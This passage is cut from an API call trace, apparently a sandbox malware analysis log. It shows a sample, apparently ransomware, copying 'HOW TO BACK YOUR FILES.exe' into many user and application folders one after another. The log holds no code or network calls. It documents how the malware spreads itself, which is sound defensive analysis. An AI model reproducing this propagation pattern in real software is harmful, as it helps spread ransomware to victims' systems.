Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.816] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.816] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.817] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.817] GetLastError () returned 0x0 [0078.817] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.817] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.817] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.817] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.817] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.817] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.817] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.817] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.818] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.818] GetLastError () returned 0x0 [0078.818] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.818] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.819] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.819] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.819] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.819] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.819] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.819] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.819] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.820] GetLastError () returned 0x0 [0078.820] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.820] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.820] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.820] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0078.820] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0078.820] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.820] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.821] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.821] GetLastError () returned 0x0 [0078.821] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.821] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.822] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.822] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.822] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.822] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.822] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.822] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.823] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.823] GetLastError () returned 0x0 [0078.823] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.823] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.823] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.823] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.823] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.823] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.823] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.823] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.824] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.824] GetLastError () returned 0x0 [0078.824] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.824] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.825] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.825] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.825] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.825] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.825] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.825] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.826] GetLastError () returned 0x0 [0078.826] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.826] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.826] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.826] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.826] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.826] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.826] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.826] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.827] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.827] GetLastError () returned 0x0 [0078.827] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.827] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.827] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.827] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.828] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.828] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.828] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.828] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.828] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.828] GetLastError () returned 0x0 [0078.829] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.829] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.829] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.829] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.829] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.829] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.829] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.829] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.830] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.830] GetLastError () returned 0x0 [0078.830] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.830] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 